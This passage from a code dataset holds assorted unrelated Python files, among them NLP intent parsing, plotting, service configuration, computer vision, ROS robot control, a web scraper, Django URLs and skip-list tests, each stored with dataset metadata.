else:\n return False\n\n\ndef is_suggestion(pos_tag_list):\n suggestion_noun_list = [\"you\", \"sayme\"]\n for pos_tag in pos_tag_list:\n if pos_tag[0] in suggestion_noun_list:\n pass\n elif pos_tag[1] == \"MD\":\n return True\n else:\n return False\n\ndef is_desire(pos_tag_list):\n ignore_pos_list = [\"RB\", \",\", \"!\", \".\"]\n VPN_list = [\"do\", \"am\", \"are\", \"is\", \"be\"]\n desire_list = [\"want\", \"hope\", \"wish\", \"desire\", \"need\", \"like\", \"love\"]\n wonder_list = [\"wonder\", \"curious\", \"aware\", \"conscious\", \"inquisitive\", \"interested\", \"questioning\", \"searching\"]\n\n\n for pos_tag in pos_tag_list: # I should get @Sun's working status.\n # if pos_tag[0] == \"I\" or pos_tag[1] in ignore_pos_list:\n # pass\n # elif pos_tag[0] in VPN_list and pos_tag[1] == \"VBP\":\n # pass\n # elif pos_tag[1] == \"MD\" or pos_tag[0] in desire_list or pos_tag[0] in wonder_list:\n # return True\n # else:\n # return False\n if pos_tag[1] in ignore_pos_list:\n pass\n elif pos_tag[0] == \"I\":\n return True\n else:\n return False\n\ndef require_something_sentence(_sentence):\n nlp = StanfordCoreNLP('http://localhost', port=9000)\n sentence = sentence_preprocess(_sentence)\n pos_tag_list = nlp.pos_tag(sentence)\n\n lemmatizer = nltk.WordNetLemmatizer()\n for pos_tag in pos_tag_list:\n if pos_tag[1] == \"VB\" or pos_tag[1] == \"VBP\" or pos_tag[1] == \"VBG\":\n org_wrd = lemmatizer.lemmatize(pos_tag[0], pos =\"v\")\n sentence = sentence.replace(\" \" + pos_tag[0] + \" \", \" \" + org_wrd + \" \")\n\n print(\"sentence\", sentence)\n print(\"pos_tag_list\", pos_tag_list)\n\n if is_question(sentence, pos_tag_list, nlp):\n for pos_tag in pos_tag_list:\n if pos_tag[1] == \"MD\" or pos_tag[0] == \"do\": # couldn't you do that?\n sentence = sentence.replace(\" \"+pos_tag[0]+\" \", \" can \", 1)\n pos_idx = pos_tag_list.index((pos_tag[0], pos_tag[1]))\n if pos_tag_list[pos_idx + 1][0] == 
\"not\":\n sentence = sentence.replace(\" not \", \" \", 1)\n if pos_tag_list[pos_idx + 1][0] == \"I\" or pos_tag_list[pos_idx + 2][0] == \"I\":\n sentence = sentence.replace(\" I \", \" you \", 1)\n break\n\n return 1, sentence\n\n elif is_command(sentence, nlp):\n return 2, sentence\n\n elif is_suggestion(pos_tag_list):\n for pos_tag in pos_tag_list:\n if pos_tag[1] == \"MD\":\n sentence = sentence.replace(pos_tag[0], \"should\", 1)\n break\n return 3, sentence\n\n elif is_desire(pos_tag_list):\n return 4, sentence\n\n else:\n return 5, sentence","sub_path":"chat_bot_server_dir/user_intent_classifier/sentence_type_finder.py","file_name":"sentence_type_finder.py","file_ext":"py","file_size_in_byte":6756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"174380336","text":"HELP_STRING=\"\"\"\n\nDate : April 22,2021\n\nAuthor : Ruiyan Hou (ruiyan_hou@163.com)\n\nThis script will produce the figure 13 in the supplementary. \nScatter plot of the splicing efficiency estimated from different technique and predicted by three feature sets.\n\n\n\"\"\"\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport pandas as pd\nfrom sklearn.ensemble import RandomForestRegressor\nfrom hilearn import corr_plot\nimport numpy as np\nimport pylab as pl\nimport matplotlib.pyplot as plt\nfrom hilearn import CrossValidation, corr_plot\nimport seaborn as sns\n\nfig = plt.figure(figsize=(9.5,3.5))\n\n\n#panel 1\npl.subplot(1,2,1)\nfig=plt.gcf()\nelifedf=pd.read_csv('/home/lzbhouruiyan/scRNA-kinetics-prediction/elife/elife-45056-supp3-v2',delimiter='\\t')\nprint(elifedf.columns.tolist())\nelifedf['splicing_efficiency']=(elifedf['mean donor-bond and acceptor-bond half-life time [min]']/elifedf['junction half-life [min]']).apply(np.log)\nelifedf['gene_id']=elifedf['gene_id'].str.split('.',expand=True)[0]\nelifedf=elifedf[['gene_id','splicing_efficiency']]\nprint(elifedf)\npred_y=pd.read_csv('/home/lzbhouruiyan/pullgit/scRNA-kinetics-prediction/data/predicted/k562_bulk_with_label.csv')\nprint(pred_y)\nelifedf=elifedf.merge(pred_y,on='gene_id')\nelifedf.columns=['gene_id','observation','prediction']\nprint(elifedf)\ncorr_plot(elifedf['observation'].values,elifedf['prediction'].values,size=20,dot_color='tomato',alpha=0.8)\npl.xlabel(\"observation \",fontsize=9)\npl.ylabel(\"prediction\",fontsize=9)\npl.title('K562(TT-seq)',fontweight='medium',fontsize=12)\n\n\n#panel 2\nplt.subplot(1,2,2)\ninspectdf=pd.read_csv('/home/lzbhouruiyan/scRNA-kinetics-prediction/PTBP1/k562/inspect/splicing.csv',index_col=0)\ninspectdf=inspectdf[['ensembl','ctrl_m/p']]\ninspectdf.columns=['gene_id','observation']\ninspect_predict_y=pd.read_csv('/home/lzbhouruiyan/pullgit/scRNA-kinetics-prediction/data/predicted/k562_bulk_without_label.csv')\ninspectdf=inspectdf.merge(inspect_predict_y,on='gene_id')\ninspectdf.rename(columns={'0':'prediction'},inplace=True)\nprint(inspectdf)\ncorr_plot(inspectdf['observation'].apply(np.log).values,inspectdf['prediction'].values,size=20,dot_color='tomato',alpha=0.8)\npl.xlabel(\"observation \",fontsize=9)\npl.ylabel(\"prediction\",fontsize=9)\npl.title('K562(RNA-seq)',fontweight='medium',fontsize=12)\n\nfig.savefig('/home/lzbhouruiyan/scRNA-kinetics-prediction/figure/supp/S13.pdf')\n\n","sub_path":"notebooks/figure/FigS13.py","file_name":"FigS13.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"562088241","text":"from os import environ\n\nRABBITMQ_CONNECTION = 
environ[\"RABBITMQ_CONNECTION\"] if environ.get(\n \"RABBITMQ_CONNECTION\") else \"localhost\"\n\nMINIO_ACCESS_KEY = environ[\"MINIO_ACCESS_KEY\"] if environ.get(\n \"MINIO_ACCESS_KEY\") else \"Q3AM3UQ867SPQQA43P2F\"\nMINIO_SECRET_KEY = environ[\"MINIO_SECRET_KEY\"] if environ.get(\n \"MINIO_SECRET_KEY\") else \"zuf+tfteSlswRu7BJ86wekitnifILbZam1KYY3TG\"\nMINIO_URL = environ[\"MINIO_URL\"] if environ.get(\n \"MINIO_URL\") else \"play.min.io:9000\"\nMINIO_BUCKET = environ[\"MINIO_BUCKET\"] if environ.get(\n \"MINIO_BUCKET\") else \"brains\"\n\nMONGO_URL = environ[\"MONGO_URL\"] if environ.get(\"MONGO_URL\") else \"mongodb://localhost:27017\" \nMONGO_DB = environ[\"MONGO_DB\"] if environ.get(\"MONGO_DB\") else \"logsDB\"\nMONGO_COLLECTION = environ[\"MONGO_COLLECTION\"] if environ.get(\"MONGO_COLLECTION\") else \"creator\"\n\n\nQUEUE = {\n \"from_client\" : \"from_client\",\n \"from_preprocessor\" : \"from_preprocessor\",\n \"from_creator\" : \"from_creator\",\n \"from_deployer\" : \"from_deployer\"\n}\n\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"13755904","text":"import torch\nimport pickle\nimport sys\nimport nltk\nfrom os.path import dirname, abspath, join, exists\n\nfrom qanta.guesser_model import Model\n\nMODEL_PATH = join(dirname(abspath(__file__)), 'dan_bias.pt')\nIND_LABEL_PATH = join(dirname(abspath(__file__)), 'word_maps.pkl')\nkUNK = ''\nkPAD = ''\n# arbitrary, temp buzzer\n# BUZZ_THRESHOLD = 0.01\nBUZZ_THRESHOLD = -200\n\nassert exists(MODEL_PATH)\nassert exists(IND_LABEL_PATH)\n\n# how to load model & data so it's initialized once?\n\n\n\ndef vectorize(word2index, tokenized_text):\n\treturn [word2index[word] if word in word2index else word2index[kUNK] for word in tokenized_text]\n\n\nclass Guesser:\n\tdef __init__(self):\n\t\tself.model = torch.load(MODEL_PATH, map_location='cpu')\n\t\twith open(IND_LABEL_PATH, 'rb') as f:\n\t\t\tself.ind_and_labels = pickle.load(f)\n\t\tself.word2index = self.ind_and_labels['word2index']\n\t\tself.index2class = self.ind_and_labels['index2class']\n\n\tdef guess_and_buzz(self, question):\n\t\ttokens = nltk.word_tokenize(question)\n\t\tvectorized = vectorize(self.word2index, tokens)\n\n\t\tinput_text = torch.Tensor([vectorized])\n\t\ttext_length = torch.Tensor([len(vectorized)])\n\t\tlogits = self.model(input_text, text_length)\n\n\t\ttop_n, top_i = logits.topk(5)\n\t\t# print(top_n, top_i, file=sys.stderr)\n\t\t# print('\\n', file=sys.stderr)\n\t\tbuzz = False\n\t\tif top_n[0][0].item() > BUZZ_THRESHOLD:\n\t\t\tbuzz = True\n\t\treturn self.index2class[top_i[0][0].item()], buzz\n\n\tdef batch_guess_and_buzz(self, questions):\n\t\treturn [self.guess_and_buzz(question) for question in questions]\n\n\tdef train(self, save=True):\n\t\tpass\n","sub_path":"src/qanta/guesser.py","file_name":"guesser.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"641348886","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys;\nfrom selenium.webdriver.chrome.options import Options;\n\noptions = Options()\noptions.add_argument(\"--headless\");\n\ndriver1 = webdriver.Chrome(options=options);\n\ndriver1.get(\"https://www.indeed.com/\");\nprint(\"Got Indeed.com\");\ndriver1SessionId = driver1.session_id;\nprint(\"The session id of driver 1 is 
\");\nprint(driver1SessionId);\nprint(\"\\n\");\n\ndriver1.get(\"https://www.glassdoor.com/\");\nprint(\"Got Glassdoor.com\");\n\n\"\"\"\ndriver2 = webdriver.Chrome(options=options);\ndriver2.session_id = driver1SessionId;\nprint(\"The session id of driver 2 is \");\nprint(driver2.session_id);\n\"\"\"\n","sub_path":"indeed-data/testmultiple.py","file_name":"testmultiple.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"222968074","text":"import cv2\nfrom sklearn.externals import joblib\nimport numpy as np\n\n\nmodel = joblib.load(\"digits.pkl\")\n\ncap = cv2.VideoCapture(0)\n\n# Check if the webcam is opened correctly\nif not cap.isOpened():\n raise IOError(\"Cannot open webcam\")\nwhile True:\n ret, frame = cap.read()\n\n grayFrame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n grayFrame = cv2.GaussianBlur(grayFrame, (5, 5), 0)\n _, fr_th = cv2.threshold(grayFrame, 155, 255, cv2.THRESH_BINARY_INV)\n _, ctrs, _ = cv2.findContours(\n fr_th, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n rects = [cv2.boundingRect(ctr) for ctr in ctrs]\n for rect in rects:\n # cat ra hinh anh moi so\n # dua ve hinh nah 28x28\n\n leng = int(rect[3]*1.6)\n pt1 = int(rect[1] + rect[3] // 2 - leng // 2)\n pt2 = int(rect[0] + rect[2] // 2 - leng // 2)\n\n roi = fr_th[pt1:pt1 + leng, pt2:pt2 + leng]\n roi = cv2.resize(roi, (28, 28), interpolation=cv2.INTER_AREA)\n roi = cv2.dilate(roi, (3, 3))\n number = np.array([roi]).reshape(1, 28*28)\n predict = model.predict(number)\n\n print(predict)\n\n cv2.imshow('video', frame)\n\n c = cv2.waitKey(1)\n if c == 13:\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"hand-digit-logis.py","file_name":"hand-digit-logis.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"386897432","text":"#!/usr/bin/env python2\n\nimport rospy\nimport math\nfrom nav_msgs.msg import Odometry, Path\nfrom geometry_msgs.msg import PoseStamped\nfrom geometry_msgs.msg import Twist\nfrom tf.transformations import euler_from_quaternion\n\n\nclass Lab2:\n\n def __init__(self):\n \"\"\"\n Class constructor\n \"\"\"\n self.px = 0\n self.py = 0\n self.pth = 0\n\n # Initialize node, name it 'path_executor'\n rospy.init_node(\"path_executor\")\n # Tell ROS that this node publishes Twist messages on the '/cmd_vel' topic\n self.cmd_vel = rospy.Publisher('/cmd_vel', Twist, queue_size=10)\n # Tell ROS that this node subscribes to Odometry messages on the '/odom' topic\n # When a message is received, call self.update_odometry\n rospy.Subscriber('/odom', Odometry, self.update_odometry)\n # Create a new service called \"execute_path\" that accepts messages of\n # type Plan and calls self.execute_planned_path() when a message is received\n rospy.Service('execute_path', Path, self.go_to)\n\n rospy.sleep(5)\n\n def send_speed(self, linear_speed, angular_speed):\n \"\"\"\n Sends the speeds to the motors.\n :param linear_speed [float] [m/s] The forward linear speed.\n :param angular_speed [float] [rad/s] The angular speed for rotating around the body center.\n \"\"\"\n\n # Make a new Twist message\n msg_cmd_vel = Twist()\n # Linear\n msg_cmd_vel.linear.x = linear_speed\n msg_cmd_vel.linear.y = 0.0\n msg_cmd_vel.linear.z = 0.0\n # Angular velocity\n msg_cmd_vel.angular.x = 0.0\n msg_cmd_vel.angular.y = 0.0\n msg_cmd_vel.angular.z = angular_speed\n # Publish the message\n self.cmd_vel.publish(msg_cmd_vel)\n\n def 
drive(self, distance, linear_speed):\n        \"\"\"\n        Drives the robot in a straight line.\n        :param distance     [float] [m]   The distance to cover.\n        :param linear_speed [float] [m/s] The forward linear speed.\n        \"\"\"\n\n        init_x = self.px\n        init_y = self.py\n        distance_traveled = 0\n        threshold = .05\n\n        self.send_speed(linear_speed, 0)\n\n        while (distance - distance_traveled) > threshold:\n            distance_traveled = math.sqrt((self.px - init_x)**2 + (self.py - init_y)**2)\n            rospy.sleep(.050)\n\n        self.send_speed(0, 0)\n\n    def rotate(self, angle, aspeed):\n        \"\"\"\n        Rotates the robot around the body center by the given angle.\n        :param angle  [float] [rad]   The angle to rotate.\n        :param aspeed [float] [rad/s] The angular speed.\n        \"\"\"\n        current_angle = self.pth\n        goal_angle = current_angle + angle\n        threshold = .01\n\n        if angle < 0:\n            aspeed = -aspeed\n\n        self.send_speed(0, aspeed)\n\n        while abs(goal_angle - current_angle) > threshold:\n            current_angle = self.pth\n            rospy.sleep(.050)\n\n        self.send_speed(0, 0)\n\n    def execute_planned_path(self, msg):\n        #rospy.ServiceProxy()\n        # list.reverse() reverses in place and returns None, so reverse first, then iterate\n        msg.plan.poses.reverse()\n        for requestedPose in msg.plan.poses:\n            self.go_to(requestedPose)\n\n    def go_to(self, msg):\n        \"\"\"\n        Calls rotate(), drive(), and rotate() to attain a given pose.\n        This method is a callback bound to a Subscriber.\n        :param msg [PoseStamped] The target pose.\n        \"\"\"\n        current_x = self.px\n        current_y = self.py\n        current_angle = self.pth\n\n        delta_x = msg.pose.position.x - current_x\n        delta_y = msg.pose.position.y - current_y\n        delta_theta = math.atan2(delta_y, delta_x) - current_angle\n\n        self.rotate(delta_theta, 0.25)\n        self.drive(math.sqrt(delta_x * delta_x + delta_y * delta_y), 0.1)\n\n    def update_odometry(self, msg):\n        \"\"\"\n        Updates the current pose of the robot.\n        This method is a callback bound to a Subscriber.\n        :param msg [Odometry] The current odometry information.\n        \"\"\"\n\n        self.px = msg.pose.pose.position.x\n        self.py = msg.pose.pose.position.y\n        quat_orig = msg.pose.pose.orientation\n        quat_list = [quat_orig.x, quat_orig.y, quat_orig.z, quat_orig.w]\n        (roll, pitch, yaw) = euler_from_quaternion(quat_list)\n        self.pth = yaw\n\n    def run(self):\n        rospy.spin()\n\n\nif __name__ == '__main__':\n    Lab2().run()\n","sub_path":"RBE3002_turtle01-master/RBE3002_turtle01-master/RBE3002_template/src/execute_path.py","file_name":"execute_path.py","file_ext":"py","file_size_in_byte":4399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"202149930","text":"import tkinter as obj\nfrom tkinter import ttk\nwin=obj.Tk()\nwin.title(\"Loop widgets\")\nlabels=['Name','Class','City','NO']\nfor item in range(len(labels)):\n    lable='Lables'+str(item)\n    ttk.Label(win,text=labels[item]).grid(row=item,column=0,sticky=obj.W)\nentry_box={\n    'Name':obj.StringVar(),\n    'Class':obj.StringVar(),\n    'City':obj.StringVar(),\n    'No':obj.StringVar()\n}\ncounter=0\nfor i in entry_box:\n    variableC=\"entryVar\"+i\n    ttk.Entry(win,width=16,textvariable=entry_box[i]).grid(row=counter,column=1)\n    counter+=1\ndef action():\n    for v in entry_box:\n        print(entry_box[v].get())\nttk.Button(win,text='Submit',command=action).grid(row=6,column=1)\n\nwin.mainloop()","sub_path":"tkinter GUI Mudule/WidgetsYsingLoop.py","file_name":"WidgetsYsingLoop.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"419503329","text":"import cv2\nimport click\nimport numpy\nfrom imutils.object_detection import 
non_max_suppression\n\n\ndef find_text(image, newW=320, newH=320, min_confidence=0.5):\n\tclone = image.copy()\n\n\t# grab the image dimensions\n\t(H, W) = clone.shape[:2]\n\n\t# set the new width and height and then determine the ratio in change for both the width and height\n\trW = W / float(newW)\n\trH = H / float(newH)\n\n\t# resize the image and grab the new image dimensions\n\tclone = cv2.resize(clone, (newW, newH))\n\n\t# define the two output layer names for the EAST detector model that we are interested -- the first is the output probabilities and the second can be used to derive the bounding box coordinates of text\n\tlayerNames = [\"feature_fusion/Conv_7/Sigmoid\", \"feature_fusion/concat_3\"]\n\n\t# load the input image and grab the image dimensions\n\t(H, W) = clone.shape[:2]\n\n\t# construct a blob from the image and then perform a forward pass of the model to obtain the two output layer sets\n\tblob = cv2.dnn.blobFromImage(clone, 1.0, (W, H), (123.68, 116.78, 103.94), swapRB=True, crop=False)\n\tnet.setInput(blob)\n\t(scores, geometry) = net.forward(layerNames)\n\n\t# grab the number of rows and columns from the scores volume, then initialize our set of bounding box rectangles and corresponding confidence scores\n\t(numRows, numCols) = scores.shape[2:4]\n\trects = []\n\tconfidences = []\n\n\t# loop over the number of rows\n\tfor y in range(0, numRows):\n\t\t# extract the scores (probabilities), followed by the geometrical data used to derive potential bounding box coordinates that surround text\n\t\tscoresData = scores[0, 0, y]\n\t\txData0 = geometry[0, 0, y]\n\t\txData1 = geometry[0, 1, y]\n\t\txData2 = geometry[0, 2, y]\n\t\txData3 = geometry[0, 3, y]\n\t\tanglesData = geometry[0, 4, y]\n\n\t\t# loop over the number of columns\n\t\tfor x in range(0, numCols):\n\t\t\t# if our score does not have sufficient probability, ignore it\n\t\t\tif scoresData[x] < min_confidence:\n\t\t\t\tcontinue\n\n\t\t\t# compute the offset factor as our resulting feature maps will be 4x smaller than the input image\n\t\t\t(offsetX, offsetY) = (x * 4.0, y * 4.0)\n\n\t\t\t# extract the rotation angle for the prediction and then compute the sin and cosine\n\t\t\tangle = anglesData[x]\n\t\t\tcos = numpy.cos(angle)\n\t\t\tsin = numpy.sin(angle)\n\n\t\t\t# use the geometry volume to derive the width and height of the bounding box\n\t\t\th = xData0[x] + xData2[x]\n\t\t\tw = xData1[x] + xData3[x]\n\n\t\t\t# compute both the starting and ending (x, y)-coordinates for the text prediction bounding box\n\t\t\tendX = int(offsetX + (cos * xData1[x]) + (sin * xData2[x]))\n\t\t\tendY = int(offsetY - (sin * xData1[x]) + (cos * xData2[x]))\n\t\t\tstartX = int(endX - w)\n\t\t\tstartY = int(endY - h)\n\n\t\t\t# add the bounding box coordinates and probability score to our respective lists\n\t\t\trects.append((startX, startY, endX, endY))\n\t\t\tconfidences.append(scoresData[x])\n\n\t# apply non-maxima suppression to suppress weak, overlapping bounding boxes\n\tboxes = non_max_suppression(numpy.array(rects), probs=confidences)\n\n\t# loop over the bounding boxes\n\tfor (startX, startY, endX, endY) in boxes:\n\t\t# scale the bounding box coordinates based on the respective ratios\n\t\tstartX = int(startX * rW)\n\t\tstartY = int(startY * rH)\n\t\tendX = int(endX * rW)\n\t\tendY = int(endY * rH)\n\n\t\t# draw the bounding box on the image\n\t\tcv2.rectangle(image, (startX, startY), (endX, endY), (0, 255, 0), 2)\n\n\ndef process_stream(source, flip=False):\n\t# capture the webcam\n\tcapture = 
cv2.VideoCapture(source)\n\n\t# capture the first frame\n\tret, frame = capture.read()\n\n\t# keep on reading each frame from the webcam\n\twhile(ret):\n\t\t# flip the frame horizontally\n\t\tif flip:\n\t\t\tframe = cv2.flip(frame, 1)\n\n\t\t# find the text in the given image\n\t\tfind_text(frame)\n\n\t\t# Display the resulting frame\n\t\tcv2.imshow('Stream', frame)\n\n\t\t# press ESC to quit\n\t\tif cv2.waitKey(33) == 27:\n\t\t\tbreak\n\n\t\t# Capture the next frame\n\t\tret, frame = capture.read()\n\n\t# release the capture and close the window once the stream ends;\n\t# 'capture' is local to this function, so cleanup has to happen here\n\tcapture.release()\n\tcv2.destroyAllWindows()\n\n\ndef process_image(file):\n\t# read the image\n\timage = cv2.imread(file)\n\n\t# find the text in the given image\n\tfind_text(image)\n\n\t# Display the resulting image\n\tcv2.imshow('Image', image)\n\n\t# press any key to quit\n\tcv2.waitKey(0)\n\tcv2.destroyAllWindows()\n\n\n@click.command()\n@click.option('--source', prompt='Which source', default='webcam', type=click.Choice(['webcam', 'image', 'video']), help='What kind of source are you using?')\n@click.option('--file', prompt='Which file', default='', help='Only applies for images and videos.')\ndef main(source, file):\n\n\tif source == 'webcam':\n\t\tprocess_stream(0, flip=True)\n\n\tif source == 'video':\n\t\tprocess_stream(file)\n\n\tif source == 'image':\n\t\tprocess_image(file)\n\n\nif __name__ == '__main__':\n\t# load the pre-trained EAST text detector\n\tnet = cv2.dnn.readNet('frozen_east_text_detection.pb')\n\n\tmain()\n","sub_path":"examples/python/text_detection/text_detection.py","file_name":"text_detection.py","file_ext":"py","file_size_in_byte":4729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
+{"seq_id":"29144506","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on March 12, 2017 at 18:56:12 - Sunday\n@author: Marllon Soares\n@site: www.marllonsoares.com.br\n@language: Python 3\n@subject: URI Online Judge | 1259 - PARES E ÍMPARES\n@problem: By Neilor Tonin, URI Brasil\n@Timelimit: 1\n@link: https://www.urionlinejudge.com.br/judge/pt/problems/view/1259\n\"\"\"\n\n# FUNCTION TO PRINT A LIST ON SCREEN\ndef mostraLista(lista):\n    for i in range(len(lista)):\n        print(lista[i])\n\nn = int(input()) # READS THE NUMBER OF TEST CASES\npares = [] # CREATES A LIST TO STORE THE EVEN VALUES\nimpares = [] # CREATES A LIST TO STORE THE ODD VALUES\n\n# RUNS THE TEST CASES\nfor i in range(n):\n    numero = int(input())\n    if numero % 2 == 0: # CHECKS WHETHER THE NUMBER IS EVEN\n        pares.append(numero) # STORES THE NUMBER IN THE EVENS LIST\n    else: # IF IT IS NOT EVEN\n        impares.append(numero) # STORES THE NUMBER IN THE ODDS LIST\n\n# SORTS THE LISTS\npares.sort() # SORTS THE EVENS LIST IN ASCENDING ORDER\nimpares.sort(reverse=True) # SORTS THE ODDS LIST IN DESCENDING ORDER\n\nmostraLista(pares) # PRINTS THE SORTED EVENS LIST\nmostraLista(impares) # PRINTS THE SORTED ODDS LIST\n","sub_path":"URI-1259/URI-1259-PARES-E-IMPARES.py","file_name":"URI-1259-PARES-E-IMPARES.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
+{"seq_id":"221896278","text":"import requests\nimport re\nheaders={\n    'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'\n    }\nr=requests.get('http://top.baidu.com/category?c=12',headers=headers)\nr.encoding='GBK'\npattern=re.compile('.*?<.*?href_top.*?>(.*?)<',re.S)\ntitles=re.findall(pattern,r.text)\nfor i 
in titles:\n    print(i)\nprint(r.cookies)\nfor key,value in r.cookies.items():\n    print(key + '=' + value)\n","sub_path":"baiduPopularSearch.py","file_name":"baiduPopularSearch.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
+{"seq_id":"536196848","text":"# -*- coding: utf8 -*-\nfrom django.conf.urls import patterns, include, url\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nfrom nm_admin_panel.admin import admin_site\nfrom nm_admin_panel.views import Creator, Viewer, Editor, ChooseAction, RunOrTestDelivery, Maillist, Delivery\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.contrib.auth import views as auth_views\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n    # Examples:\n    # url(r'^$', 'nm_admin.views.home', name='home'),\n    # url(r'^nm_admin/', include('nm_admin.foo.urls')),\n\n    # Uncomment the admin/doc line below to enable admin documentation:\n    # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n    # Uncomment the next line to enable the admin:\n    url(r'^admin/', include(admin.site.urls)),\n    # url(r'^nm_admin/', include(admin_site.urls)),\n)\n\n# login and logout\nurlpatterns += patterns('django.contrib.auth.views',\n                        url(r'^accounts/login/$', auth_views.login,\n                            {'template_name': 'admin/login.html'}, name='mrulogin'),\n                        url(r'^logout/?$',\n                            auth_views.logout, name='logout', kwargs={'next_page': '/'}),\n                        )\n\nurlpatterns += patterns('nm_admin_panel.views',\n                        url(r'^$', 'index_page', name=\"index\"),\n                        url(r'^create/?$', login_required(Creator.as_view()), name='create_new'),\n                        url(r'^list/?$', login_required(Viewer.as_view()), name=\"template_list\"),\n                        url(r'^edit/(?P<id>\\d+)?$', login_required(Editor.as_view()), name=\"template_edit\"),\n                        url(r'^action/(?P<id>\\d+)?$', login_required(ChooseAction.as_view()), name=\"choose_action\"),\n                        url(r'^maillist/?$', login_required(Maillist.as_view()), name=\"maillist\"),\n                        url(r'^launch_delivery/(?P<id>\\d+)?$', login_required(RunOrTestDelivery.as_view()), name='launch_delivery'),\n                        url(r'^delivery/(?P<id>\\d+)?$', login_required(Delivery.as_view()), name=\"delivery\"),\n                        )\n\nurlpatterns += staticfiles_urlpatterns()","sub_path":"hostcomm-mru/nm_admin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
+{"seq_id":"101392573","text":"import unittest\nimport logging\nimport random\nfrom skiplist_no_log import SkipList\n\n \nclass SkipListTestCase(unittest.TestCase):\n    MIN_NODES_TO_INSERT = 5\n    MAX_NODES_TO_INSERT = 20\n    MAX_LEVEL = 5\n    P = 0.5\n\n    def setUp(self):\n        self.sl = SkipList(self.P, self.MAX_LEVEL)\n\n\n    def test_init(self):\n        log = logging.getLogger(\"SkipListTestCase.test_init\" )\n        self.assertEqual(self.sl.level, 0)\n        self.assertEqual(len(self.sl.HEADER.forward), self.sl.maxLevel)\n        self.assertEqual(len(self.sl.NIL.forward), 0)\n\n    # Note: could fail if two nodes with the same key are generated\n    def test_first_level_has_all_nodes_after_insert(self):\n        log = logging.getLogger(\"SkipListTestCase.test_first_level_has_all_nodes_after_insert\" )\n        n_of_nodes = random.randint(self.MIN_NODES_TO_INSERT, self.MAX_NODES_TO_INSERT)\n        log.debug(\"Number of nodes to insert = %s\", n_of_nodes)\n        for i in range(n_of_nodes):\n            key = random.randint(self.sl.MIN_KEY_VALUE, 
self.sl.MAX_KEY_VALUE)\n            value = random.randint(0, 99999)\n            self.sl.insert(key, value)\n        \n        log.debug(self.sl.level_to_string(0))\n        for n in self.sl.get_nodes_of_level(0):\n            log.debug(n.key)\n        # Account for the header and NIL sentinel nodes as well\n        self.assertEqual(len(self.sl.get_nodes_of_level(0)), n_of_nodes + 2 )\n\n    def test_search(self):\n        log = logging.getLogger(\"SkipListTestCase.test_search\" )\n        n_of_nodes = random.randint(5, 6)\n        log.debug(\"Number of nodes to insert = %s\", n_of_nodes)\n        node_to_search = random.randrange(0, n_of_nodes)\n        log.debug(\"Among all generated nodes, we'll search for the %s-th generated\",\n                node_to_search)\n\n        for i in range(n_of_nodes):\n            key = random.randint(self.sl.MIN_KEY_VALUE, self.sl.MAX_KEY_VALUE)\n            value = random.randint(0, 99999)\n            self.sl.insert(key, value)\n            if i == node_to_search:\n                search_key = key\n                search_value = value\n                log.debug(\"Node to search has key = %s and value = %s\", \n                    key, value )\n        log.debug(self.sl.list_to_string())\n        found_value = self.sl.search(search_key)\n        log.debug(\"Found value = %s\", found_value)\n        self.assertEqual(found_value, search_value)\n\n    \n    \nif __name__ == '__main__':\n    logging.basicConfig(filename='testsuite.log', filemode='w', level=logging.DEBUG)\n    logging.getLogger(\"SkipListTestCase.test_init\").setLevel(logging.ERROR)\n    logging.getLogger(\"SkipListTestCase.test_first_level_has_all_nodes_after_insert\").setLevel(logging.ERROR)\n    logging.getLogger(\"SkipListTestCase.test_search\").setLevel(logging.ERROR)\n    unittest.main() \n","sub_path":"Python/testsuite.py","file_name":"testsuite.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
